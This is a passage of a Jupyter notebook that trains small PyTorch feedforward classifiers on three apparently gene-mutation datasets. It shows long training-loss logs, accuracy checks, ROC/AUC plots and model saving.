"Epoch 0: train loss: 0.5590205192565918\nEpoch 1: train loss: 0.5586019158363342\nEpoch 2: train loss: 0.55849289894104\nEpoch 3: train loss: 0.5578608512878418\nEpoch 4: train loss: 0.5575639605522156\nEpoch 5: train loss: 0.5571672916412354\nEpoch 6: train loss: 0.5567829608917236\nEpoch 7: train loss: 0.5563794374465942\nEpoch 8: train loss: 0.556013286113739\nEpoch 9: train loss: 0.5555663704872131\nEpoch 10: train loss: 0.5553125143051147\nEpoch 11: train loss: 0.5547751188278198\nEpoch 12: train loss: 0.5544097423553467\nEpoch 13: train loss: 0.5540792942047119\nEpoch 14: train loss: 0.5536219477653503\nEpoch 15: train loss: 0.5532200336456299\nEpoch 16: train loss: 0.5529664158821106\nEpoch 17: train loss: 0.5525164008140564\nEpoch 18: train loss: 0.5520655512809753\nEpoch 19: train loss: 0.5519570112228394\nEpoch 20: train loss: 0.5513371229171753\nEpoch 21: train loss: 0.5514026284217834\nEpoch 22: train loss: 0.550910472869873\nEpoch 23: train loss: 0.550265908241272\nEpoch 24: train loss: 0.5499394536018372\nEpoch 25: train loss: 0.5496484637260437\nEpoch 26: train loss: 0.5492641925811768\nEpoch 27: train loss: 0.5486128926277161\nEpoch 28: train loss: 0.5483952164649963\nEpoch 29: train loss: 0.5480167865753174\nEpoch 30: train loss: 0.547763466835022\nEpoch 31: train loss: 0.5469951033592224\nEpoch 32: train loss: 0.5467607975006104\nEpoch 33: train loss: 0.5463106632232666\nEpoch 34: train loss: 0.546029806137085\nEpoch 35: train loss: 0.5453856587409973\nEpoch 36: train loss: 0.5455795526504517\nEpoch 37: train loss: 0.5446864366531372\nEpoch 38: train loss: 0.5447852611541748\nEpoch 39: train loss: 0.5443130135536194\nEpoch 40: train loss: 0.543426513671875\nEpoch 41: train loss: 0.5440050363540649\nEpoch 42: train loss: 0.5430793762207031\nEpoch 43: train loss: 0.5429871082305908\nEpoch 44: train loss: 0.5432665944099426\nEpoch 45: train loss: 0.5415104627609253\nEpoch 46: train loss: 0.5429471135139465\nEpoch 47: train loss: 0.5416741371154785\nEpoch 48: train loss: 0.5406892895698547\nEpoch 49: train loss: 0.5413985252380371\nEpoch 50: train loss: 0.5399373173713684\nEpoch 51: train loss: 0.5398103594779968\nEpoch 52: train loss: 0.5399395227432251\nEpoch 53: train loss: 0.5385415554046631\nEpoch 54: train loss: 0.5389920473098755\nEpoch 55: train loss: 0.538070797920227\nEpoch 56: train loss: 0.5375166535377502\nEpoch 57: train loss: 0.5373629927635193\nEpoch 58: train loss: 0.536455512046814\nEpoch 59: train loss: 0.5362730026245117\nEpoch 60: train loss: 0.5358228087425232\nEpoch 61: train loss: 0.5353663563728333\nEpoch 62: train loss: 0.5350207686424255\nEpoch 63: train loss: 0.5346797108650208\nEpoch 64: train loss: 0.534232497215271\nEpoch 65: train loss: 0.5340246558189392\nEpoch 66: train loss: 0.5335938334465027\nEpoch 67: train loss: 0.5333315134048462\nEpoch 68: train loss: 0.5328165292739868\nEpoch 69: train loss: 0.5326717495918274\nEpoch 70: train loss: 0.5321176648139954\nEpoch 71: train loss: 0.5318762063980103\nEpoch 72: train loss: 0.5314476490020752\nEpoch 73: train loss: 0.5310319066047668\nEpoch 74: train loss: 0.5310401320457458\nEpoch 75: train loss: 0.5304006338119507\nEpoch 76: train loss: 0.5303657054901123\nEpoch 77: train loss: 0.5296261310577393\nEpoch 78: train loss: 0.5296155214309692\nEpoch 79: train loss: 0.5289064645767212\nEpoch 80: train loss: 0.5288798213005066\nEpoch 81: train loss: 0.5282028317451477\nEpoch 82: train loss: 0.5282602310180664\nEpoch 83: train loss: 0.5274994969367981\nEpoch 84: train loss: 
0.5273208618164062\nEpoch 85: train loss: 0.5269773006439209\nEpoch 86: train loss: 0.5265169739723206\nEpoch 87: train loss: 0.5264708399772644\nEpoch 88: train loss: 0.5258440971374512\nEpoch 89: train loss: 0.5256856679916382\nEpoch 90: train loss: 0.5252133011817932\nEpoch 91: train loss: 0.5249210000038147\nEpoch 92: train loss: 0.5245431065559387\nEpoch 93: train loss: 0.5242816209793091\nEpoch 94: train loss: 0.5239903330802917\nEpoch 95: train loss: 0.5235278606414795\nEpoch 96: train loss: 0.523310661315918\nEpoch 97: train loss: 0.5228608250617981\nEpoch 98: train loss: 0.5225307941436768\nEpoch 99: train loss: 0.5223765969276428\nEpoch 100: train loss: 0.5220914483070374\nEpoch 101: train loss: 0.5213780403137207\nEpoch 102: train loss: 0.5212794542312622\nEpoch 103: train loss: 0.5208983421325684\nEpoch 104: train loss: 0.5206651091575623\nEpoch 105: train loss: 0.5200249552726746\nEpoch 106: train loss: 0.5225282311439514\nEpoch 107: train loss: 0.5209851264953613\nEpoch 108: train loss: 0.5214298367500305\nEpoch 109: train loss: 0.5187267661094666\nEpoch 110: train loss: 0.5257800221443176\nEpoch 111: train loss: 0.519717276096344\nEpoch 112: train loss: 0.5306852459907532\nEpoch 113: train loss: 0.5267211198806763\nEpoch 114: train loss: 0.5244829058647156\nEpoch 115: train loss: 0.5300217270851135\nEpoch 116: train loss: 0.5203309655189514\nEpoch 117: train loss: 0.5315479040145874\nEpoch 118: train loss: 0.525233268737793\nEpoch 119: train loss: 0.524168074131012\nEpoch 120: train loss: 0.5291113257408142\nEpoch 121: train loss: 0.5177518725395203\nEpoch 122: train loss: 0.5315988063812256\nEpoch 123: train loss: 0.5234419107437134\nEpoch 124: train loss: 0.5238824486732483\nEpoch 125: train loss: 0.5331776738166809\nEpoch 126: train loss: 0.5212528705596924\nEpoch 127: train loss: 0.5216946601867676\nEpoch 128: train loss: 0.5227426886558533\nEpoch 129: train loss: 0.5166742205619812\nEpoch 130: train loss: 0.519821286201477\nEpoch 131: train loss: 0.5140149593353271\nEpoch 132: train loss: 0.5168339014053345\nEpoch 133: train loss: 0.5136595964431763\nEpoch 134: train loss: 0.5169833302497864\nEpoch 135: train loss: 0.512945294380188\nEpoch 136: train loss: 0.514811098575592\nEpoch 137: train loss: 0.514095664024353\nEpoch 138: train loss: 0.5143634676933289\nEpoch 139: train loss: 0.512073814868927\nEpoch 140: train loss: 0.513893187046051\nEpoch 141: train loss: 0.5117390751838684\nEpoch 142: train loss: 0.5169969797134399\nEpoch 143: train loss: 0.511292040348053\nEpoch 144: train loss: 0.5173954963684082\nEpoch 145: train loss: 0.512198805809021\nEpoch 146: train loss: 0.5174357891082764\nEpoch 147: train loss: 0.5186066627502441\nEpoch 148: train loss: 0.5096694231033325\nEpoch 149: train loss: 0.5132239460945129\nEpoch 150: train loss: 0.5105436444282532\nEpoch 151: train loss: 0.5144311189651489\nEpoch 152: train loss: 0.5097835659980774\nEpoch 153: train loss: 0.5194860100746155\nEpoch 154: train loss: 0.5124813318252563\nEpoch 155: train loss: 0.5146098136901855\nEpoch 156: train loss: 0.5163430571556091\nEpoch 157: train loss: 0.5076141953468323\nEpoch 158: train loss: 0.5165174603462219\nEpoch 159: train loss: 0.508523166179657\nEpoch 160: train loss: 0.5168237686157227\nEpoch 161: train loss: 0.5180616974830627\nEpoch 162: train loss: 0.5073416233062744\nEpoch 163: train loss: 0.523413896560669\nEpoch 164: train loss: 0.5124977827072144\nEpoch 165: train loss: 0.5161406993865967\nEpoch 166: train loss: 0.5230523943901062\nEpoch 167: train loss: 
0.5095783472061157\nEpoch 168: train loss: 0.5264846682548523\nEpoch 169: train loss: 0.5151458978652954\nEpoch 170: train loss: 0.5152561664581299\nEpoch 171: train loss: 0.5291914939880371\nEpoch 172: train loss: 0.516307532787323\nEpoch 173: train loss: 0.508953869342804\nEpoch 174: train loss: 0.5199965834617615\nEpoch 175: train loss: 0.5043749809265137\nEpoch 176: train loss: 0.515712320804596\nEpoch 177: train loss: 0.5131959915161133\nEpoch 178: train loss: 0.5037013292312622\nEpoch 179: train loss: 0.51292884349823\nEpoch 180: train loss: 0.5041811466217041\nEpoch 181: train loss: 0.5100228190422058\nEpoch 182: train loss: 0.5116122961044312\nEpoch 183: train loss: 0.5090858936309814\nEpoch 184: train loss: 0.502968966960907\nEpoch 185: train loss: 0.5080538392066956\nEpoch 186: train loss: 0.5020960569381714\nEpoch 187: train loss: 0.5071541666984558\nEpoch 188: train loss: 0.5072880387306213\nEpoch 189: train loss: 0.5024657845497131\nEpoch 190: train loss: 0.5106790661811829\nEpoch 191: train loss: 0.503774881362915\nEpoch 192: train loss: 0.5075362324714661\nEpoch 193: train loss: 0.5100893378257751\nEpoch 194: train loss: 0.5050360560417175\nEpoch 195: train loss: 0.5050369501113892\nEpoch 196: train loss: 0.5045539140701294\nEpoch 197: train loss: 0.5035988092422485\nEpoch 198: train loss: 0.5053728222846985\nEpoch 199: train loss: 0.5015335083007812\n"
],
[
"plt.plot(loss_array)\nplt.title(\"Training Loss of ANN on Dataset1\")\nplt.xlabel(\"Epoches\")\nplt.ylabel(\"Loss Value\")",
"_____no_output_____"
],
[
"model1.eval()\ny_pred_first = model1(X_test_first)\ny_pred_first_int = []\n\nfor item in y_pred_first:\n y_pred_first_int.append(round(float(item[0])))\nprint(y_pred_first_int)\nprint(y_test_first)\nprint(np.sum(y_pred_first_int==np.array(y_test_first))/len(y_pred_first_int))",
"[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1]\ntensor([0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1., 0., 1., 0., 1., 1., 1.,\n 1., 1., 0., 1., 0., 1., 1., 1., 0., 1., 0., 1., 1., 1.])\n0.75\n"
],
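[
"# Accuracy alone can hide the class imbalance, so recall is also worth a look;\n# recall_score was already imported at the top of the notebook (illustrative check only):\nprint('recall on the test set:', recall_score(y_test_first.int().numpy(), y_pred_first_int))",
"_____no_output_____"
],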
[
"### accuracy on training set\ny_pred = model1(X_train_first)\ny_pred_int = []\n\nfor item in y_pred:\n y_pred_int.append(round(float(item[0])))\nprint(y_pred_int)\nprint(y_train_first)\nprint(np.sum(y_pred_int==np.array(y_train_first))/len(y_pred_int))",
"[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0]\ntensor([0., 0., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 0., 0., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1.,\n 1., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 1., 1., 0., 1.,\n 1., 0., 0., 1., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 0.,\n 1., 1., 0., 1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 1., 1., 1., 1., 0., 1., 0., 0., 1., 1., 0., 1., 1., 1., 1., 1.,\n 1., 1., 1., 0., 0., 0., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1.])\n0.7222222222222222\n"
],
[
"### ROC and AUC for ANN1\n\ny_label = y_test_first.int().tolist() # 非二进制需要pos_label\ny_pre = y_pred_first_int\nprint(y_label)\nprint(y_pre)\nfpr1, tpr1, thersholds1 = roc_curve(y_label, y_pre, pos_label=1)\nfpr2, tpr2, thersholds2 = roc_curve(y_test_second, y_pred_second_int, pos_label=1)\nfpr3, tpr3, thersholds3 = roc_curve(y_test_third, y_pred_third_int, pos_label=1)\n\n\n \n# for i, value in enumerate(thersholds):\n# print(\"%f %f %f\" % (fpr[i], tpr[i], value))\n \nroc_auc1 = auc(fpr1, tpr1)\nroc_auc2 = auc(fpr2, tpr2)\nroc_auc3 = auc(fpr3, tpr3)\n \nplt.plot(fpr1, tpr1, 'k--', label='ROC (area = {0:.2f}) without Gene Sequence'.format(roc_auc1), lw=2, color='b')\nplt.plot(fpr2, tpr2, 'k--', label='ROC (area = {0:.2f}) with TB53,rb1 and pik3ca'.format(roc_auc2), lw=2, color='r')\nplt.plot(fpr3, tpr3, 'k--', label='ROC (area = {0:.2f}) with Number of Mutated Genes'.format(roc_auc3), lw=2, color='g')\n\n \nplt.xlim([-0.05, 1.05]) # 设置x、y轴的上下限,以免和边缘重合,更好的观察图像的整体\nplt.ylim([-0.05, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate') # 可以使用中文,但需要导入一些库即字体\nplt.title('ROC Curves of ANN')\nplt.legend(loc=\"lower right\")",
"[0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1]\n[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1]\n"
]
],
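[
[
"# The same training loop is written out separately for each of the three datasets; a small\n# helper like this could factor it out (a sketch only -- the explicit loops below are kept as-is):\ndef fit(model, criterion, optimizer, X, y, epochs=200):\n    model.train()\n    history = []\n    for _ in range(epochs):\n        optimizer.zero_grad()\n        loss = criterion(model(X).squeeze(), y)\n        loss.backward()\n        optimizer.step()\n        history.append(float(loss.item()))\n    return history",
"_____no_output_____"
]
],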
[
[
"### Model for Dataset2",
"_____no_output_____"
]
],
[
[
"class Feedforward_second(torch.nn.Module):\n def __init__(self, input_size, hidden_size):\n super(Feedforward_second, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.batchnorm = torch.nn.BatchNorm1d(self.input_size)\n self.laynorm = torch.nn.LayerNorm(self.input_size)\n self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)\n self.fc3 = torch.nn.Linear(5, 1, bias=True)\n self.sigmoid = torch.nn.Sigmoid()\n def forward(self, x):\n hidden = self.fc1(x)\n batchnorm = self.batchnorm(hidden)\n laynorm = self.laynorm(batchnorm)\n relu = self.relu(laynorm)\n output = self.fc2(relu)\n output = self.fc3(output)\n output = self.sigmoid(output)\n return output",
"_____no_output_____"
],
[
"X_train_second",
"_____no_output_____"
],
[
"model2 = Feedforward_second(X_train_second.shape[1],15)\ncriterion2 = torch.nn.BCELoss()\noptimizer2 = torch.optim.Adam(model2.parameters(), lr = 0.01, weight_decay= 0.001)",
"_____no_output_____"
],
[
"model2.train()\nepoch = 200\nloss_array = []\nfor epoch in range(epoch):\n optimizer2.zero_grad()\n # Forward pass\n y_pred = model2(X_train_second)\n # Compute Loss\n loss = criterion2(y_pred.squeeze(), y_train_second)\n loss_array.append(float(loss.item()))\n print('Epoch {}: train loss: {}'.format(epoch, loss.item()))\n # Backward pass\n loss.backward()\n optimizer2.step()",
"Epoch 0: train loss: 0.6052454710006714\nEpoch 1: train loss: 0.5969358086585999\nEpoch 2: train loss: 0.5904589891433716\nEpoch 3: train loss: 0.584665060043335\nEpoch 4: train loss: 0.579624354839325\nEpoch 5: train loss: 0.572795033454895\nEpoch 6: train loss: 0.5640113949775696\nEpoch 7: train loss: 0.5548313856124878\nEpoch 8: train loss: 0.5458484292030334\nEpoch 9: train loss: 0.5364435315132141\nEpoch 10: train loss: 0.5238454937934875\nEpoch 11: train loss: 0.5097098350524902\nEpoch 12: train loss: 0.4956801235675812\nEpoch 13: train loss: 0.48102617263793945\nEpoch 14: train loss: 0.4656539559364319\nEpoch 15: train loss: 0.4511193335056305\nEpoch 16: train loss: 0.4363560974597931\nEpoch 17: train loss: 0.42070847749710083\nEpoch 18: train loss: 0.4050501585006714\nEpoch 19: train loss: 0.3906722068786621\nEpoch 20: train loss: 0.3784583508968353\nEpoch 21: train loss: 0.368916392326355\nEpoch 22: train loss: 0.3594647943973541\nEpoch 23: train loss: 0.3484821021556854\nEpoch 24: train loss: 0.33943334221839905\nEpoch 25: train loss: 0.3335486054420471\nEpoch 26: train loss: 0.3257678747177124\nEpoch 27: train loss: 0.31837499141693115\nEpoch 28: train loss: 0.3114306330680847\nEpoch 29: train loss: 0.304557204246521\nEpoch 30: train loss: 0.29661262035369873\nEpoch 31: train loss: 0.2895645797252655\nEpoch 32: train loss: 0.2818766236305237\nEpoch 33: train loss: 0.2724047005176544\nEpoch 34: train loss: 0.26493412256240845\nEpoch 35: train loss: 0.25809168815612793\nEpoch 36: train loss: 0.25092288851737976\nEpoch 37: train loss: 0.2449619472026825\nEpoch 38: train loss: 0.2377459704875946\nEpoch 39: train loss: 0.23008576035499573\nEpoch 40: train loss: 0.22217820584774017\nEpoch 41: train loss: 0.21620342135429382\nEpoch 42: train loss: 0.2071414291858673\nEpoch 43: train loss: 0.199288472533226\nEpoch 44: train loss: 0.19183333218097687\nEpoch 45: train loss: 0.18506427109241486\nEpoch 46: train loss: 0.17897669970989227\nEpoch 47: train loss: 0.1730639785528183\nEpoch 48: train loss: 0.16774125397205353\nEpoch 49: train loss: 0.15852828323841095\nEpoch 50: train loss: 0.15396912395954132\nEpoch 51: train loss: 0.1479717493057251\nEpoch 52: train loss: 0.13901352882385254\nEpoch 53: train loss: 0.13643009960651398\nEpoch 54: train loss: 0.1269584447145462\nEpoch 55: train loss: 0.12238290905952454\nEpoch 56: train loss: 0.11412519216537476\nEpoch 57: train loss: 0.10970237106084824\nEpoch 58: train loss: 0.10409706830978394\nEpoch 59: train loss: 0.09902621805667877\nEpoch 60: train loss: 0.09457860141992569\nEpoch 61: train loss: 0.08964154869318008\nEpoch 62: train loss: 0.08635799586772919\nEpoch 63: train loss: 0.08193625509738922\nEpoch 64: train loss: 0.07843025028705597\nEpoch 65: train loss: 0.07399163395166397\nEpoch 66: train loss: 0.07113555073738098\nEpoch 67: train loss: 0.06684628874063492\nEpoch 68: train loss: 0.06305428594350815\nEpoch 69: train loss: 0.05958578735589981\nEpoch 70: train loss: 0.05602429434657097\nEpoch 71: train loss: 0.051782943308353424\nEpoch 72: train loss: 0.047671470791101456\nEpoch 73: train loss: 0.04403860867023468\nEpoch 74: train loss: 0.04078907147049904\nEpoch 75: train loss: 0.03797098621726036\nEpoch 76: train loss: 0.03513307124376297\nEpoch 77: train loss: 0.03270452469587326\nEpoch 78: train loss: 0.030219603329896927\nEpoch 79: train loss: 0.027843289077281952\nEpoch 80: train loss: 0.025676794350147247\nEpoch 81: train loss: 0.02372279018163681\nEpoch 82: train loss: 0.022016892209649086\nEpoch 83: train loss: 
0.020494308322668076\nEpoch 84: train loss: 0.018974902108311653\nEpoch 85: train loss: 0.017689315602183342\nEpoch 86: train loss: 0.016454746946692467\nEpoch 87: train loss: 0.015370991080999374\nEpoch 88: train loss: 0.014367111027240753\nEpoch 89: train loss: 0.013457266613841057\nEpoch 90: train loss: 0.012592986226081848\nEpoch 91: train loss: 0.011884567327797413\nEpoch 92: train loss: 0.011192206293344498\nEpoch 93: train loss: 0.010564757511019707\nEpoch 94: train loss: 0.009898116812109947\nEpoch 95: train loss: 0.00940116960555315\nEpoch 96: train loss: 0.008856242522597313\nEpoch 97: train loss: 0.00838000513613224\nEpoch 98: train loss: 0.007945524528622627\nEpoch 99: train loss: 0.007497259881347418\nEpoch 100: train loss: 0.007162530440837145\nEpoch 101: train loss: 0.006818610243499279\nEpoch 102: train loss: 0.0065324255265295506\nEpoch 103: train loss: 0.00619979714974761\nEpoch 104: train loss: 0.0059780701994895935\nEpoch 105: train loss: 0.005765127949416637\nEpoch 106: train loss: 0.005560785066336393\nEpoch 107: train loss: 0.005371598061174154\nEpoch 108: train loss: 0.005205294582992792\nEpoch 109: train loss: 0.005071834195405245\nEpoch 110: train loss: 0.004897171165794134\nEpoch 111: train loss: 0.004784705583006144\nEpoch 112: train loss: 0.004667376633733511\nEpoch 113: train loss: 0.004537016618996859\nEpoch 114: train loss: 0.004441241733729839\nEpoch 115: train loss: 0.004352880641818047\nEpoch 116: train loss: 0.004259277600795031\nEpoch 117: train loss: 0.00416290108114481\nEpoch 118: train loss: 0.004054964054375887\nEpoch 119: train loss: 0.003963435534387827\nEpoch 120: train loss: 0.0038792123086750507\nEpoch 121: train loss: 0.003809853922575712\nEpoch 122: train loss: 0.003747938433662057\nEpoch 123: train loss: 0.003696975763887167\nEpoch 124: train loss: 0.0036320772487670183\nEpoch 125: train loss: 0.0035689377691596746\nEpoch 126: train loss: 0.0035274995025247335\nEpoch 127: train loss: 0.003470861352980137\nEpoch 128: train loss: 0.003433588659390807\nEpoch 129: train loss: 0.0033979653380811214\nEpoch 130: train loss: 0.0033710896968841553\nEpoch 131: train loss: 0.003332283813506365\nEpoch 132: train loss: 0.0032996099907904863\nEpoch 133: train loss: 0.0032811418641358614\nEpoch 134: train loss: 0.0032510515302419662\nEpoch 135: train loss: 0.0032257793936878443\nEpoch 136: train loss: 0.003209572285413742\nEpoch 137: train loss: 0.0031971586868166924\nEpoch 138: train loss: 0.0031769326888024807\nEpoch 139: train loss: 0.003176722675561905\nEpoch 140: train loss: 0.0031492789275944233\nEpoch 141: train loss: 0.003143546637147665\nEpoch 142: train loss: 0.003124909708276391\nEpoch 143: train loss: 0.003143055597320199\nEpoch 144: train loss: 0.00314461556263268\nEpoch 145: train loss: 0.003129849676042795\nEpoch 146: train loss: 0.0031336424872279167\nEpoch 147: train loss: 0.0031024152413010597\nEpoch 148: train loss: 0.0031168144196271896\nEpoch 149: train loss: 0.0030993421096354723\nEpoch 150: train loss: 0.0031011654064059258\nEpoch 151: train loss: 0.0030854507349431515\nEpoch 152: train loss: 0.003076585941016674\nEpoch 153: train loss: 0.003074432723224163\nEpoch 154: train loss: 0.0030587250366806984\nEpoch 155: train loss: 0.0030573117546737194\nEpoch 156: train loss: 0.003055980196222663\nEpoch 157: train loss: 0.003031747182831168\nEpoch 158: train loss: 0.0030324955005198717\nEpoch 159: train loss: 0.0030291108414530754\nEpoch 160: train loss: 0.00299970549531281\nEpoch 161: train loss: 0.0029882187955081463\nEpoch 162: train 
loss: 0.0030813824851065874\nEpoch 163: train loss: 0.0031573663000017405\nEpoch 164: train loss: 0.003080239985138178\nEpoch 165: train loss: 0.003136890707537532\nEpoch 166: train loss: 0.0034634305629879236\nEpoch 167: train loss: 0.0030878926627337933\nEpoch 168: train loss: 0.003239982295781374\nEpoch 169: train loss: 0.003200431587174535\nEpoch 170: train loss: 0.0031227373983711004\nEpoch 171: train loss: 0.0031185420230031013\nEpoch 172: train loss: 0.0030704373493790627\nEpoch 173: train loss: 0.0029332146514207125\nEpoch 174: train loss: 0.0030170355457812548\nEpoch 175: train loss: 0.0028758137486875057\nEpoch 176: train loss: 0.002940699690952897\nEpoch 177: train loss: 0.0028413222171366215\nEpoch 178: train loss: 0.0029179120901972055\nEpoch 179: train loss: 0.0027829469181597233\nEpoch 180: train loss: 0.002895570592954755\nEpoch 181: train loss: 0.0027690043207257986\nEpoch 182: train loss: 0.002795223379507661\nEpoch 183: train loss: 0.0027387402951717377\nEpoch 184: train loss: 0.0027281742077320814\nEpoch 185: train loss: 0.00273157749325037\nEpoch 186: train loss: 0.002737649017944932\nEpoch 187: train loss: 0.002689948072656989\nEpoch 188: train loss: 0.0026536895893514156\nEpoch 189: train loss: 0.0026807847898453474\nEpoch 190: train loss: 0.0026659953873604536\nEpoch 191: train loss: 0.0026901597157120705\nEpoch 192: train loss: 0.002629604423418641\nEpoch 193: train loss: 0.0026427379343658686\nEpoch 194: train loss: 0.002647355431690812\nEpoch 195: train loss: 0.0026274556294083595\nEpoch 196: train loss: 0.0026420254725962877\nEpoch 197: train loss: 0.002602399792522192\nEpoch 198: train loss: 0.0026064766570925713\nEpoch 199: train loss: 0.0026184143498539925\n"
],
[
"torch.save(model2, \"ann_model.pt\")",
"_____no_output_____"
],
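[
"# Reloading the saved model for later inference (a minimal sketch). Saving the whole module\n# with torch.save means the Feedforward_second class must be importable at load time;\n# saving model2.state_dict() instead would be the more portable alternative.\nreloaded = torch.load('ann_model.pt')\nreloaded.eval()\nwith torch.no_grad():\n    print(reloaded(X_test_second)[:5])",
"_____no_output_____"
],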
[
"plt.plot(loss_array)\nplt.title(\"Training Loss of ANN on Dataset2\")\nplt.xlabel(\"Epoches\")\nplt.ylabel(\"Loss Value\")",
"_____no_output_____"
],
[
"model2.eval()\ny_pred_second = model2(X_test_second)\ny_pred_second_int = []\n\nfor item in y_pred_second:\n y_pred_second_int.append(round(float(item[0])))\nprint(y_pred_second_int)\nprint(y_test_second)\nprint(np.sum(y_pred_second_int==np.array(y_test_second))/len(y_test_second))",
"[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1]\ntensor([0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1., 0., 1., 0., 1., 1., 1.,\n 1., 1., 0., 1., 0., 1., 1., 1., 0., 1., 0., 1., 1., 1.])\n0.8125\n"
],
[
"### accuracy on training set\ny_pred = model2(X_train_second)\ny_pred_int = []\n\nfor item in y_pred:\n y_pred_int.append(round(float(item[0])))\nprint(y_pred_int)\nprint(y_train_second)\nprint(np.sum(y_pred_int==np.array(y_train_second))/len(y_pred_int))",
"[0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1]\ntensor([0., 0., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 0., 0., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1.,\n 1., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 1., 1., 0., 1.,\n 1., 0., 0., 1., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 0.,\n 1., 1., 0., 1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 1., 1., 1., 1., 0., 1., 0., 0., 1., 1., 0., 1., 1., 1., 1., 1.,\n 1., 1., 1., 0., 0., 0., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1.])\n1.0\n"
]
],
[
[
"### Model for Dataset3",
"_____no_output_____"
]
],
[
[
"class Feedforward_third(torch.nn.Module):\n def __init__(self, input_size, hidden_size):\n super(Feedforward_third, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.batchnorm = torch.nn.BatchNorm1d(self.hidden_size)\n self.laynorm = torch.nn.LayerNorm(self.input_size)\n self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)\n self.relu2 = torch.nn.ReLU()\n self.fc3 = torch.nn.Linear(5, 1, bias=True)\n self.sigmoid = torch.nn.Sigmoid()\n def forward(self, x):\n hidden = self.fc1(x)\n batchnorm = self.batchnorm(hidden)\n laynorm = self.laynorm(batchnorm)\n relu = self.relu(laynorm)\n output = self.fc2(relu)\n self.relu2 = torch.nn.ReLU()\n output = self.fc3(output)\n output = self.sigmoid(output)\n return output",
"_____no_output_____"
],
[
"model3 = Feedforward_third(X_train_third.shape[1],13)\ncriterion3 = torch.nn.BCELoss()\noptimizer3 = torch.optim.Adam(model3.parameters(), lr = 0.01, weight_decay= 0.001)",
"_____no_output_____"
],
[
"model3.train()\nepoch = 150\nloss_array = []\nfor epoch in range(epoch):\n optimizer3.zero_grad()\n # Forward pass\n y_pred = model3(X_train_third)\n # Compute Loss\n loss = criterion3(y_pred.squeeze(), y_train_third)\n loss_array.append(float(loss.item()))\n print('Epoch {}: train loss: {}'.format(epoch, loss.item()))\n # Backward pass\n loss.backward()\n optimizer3.step()",
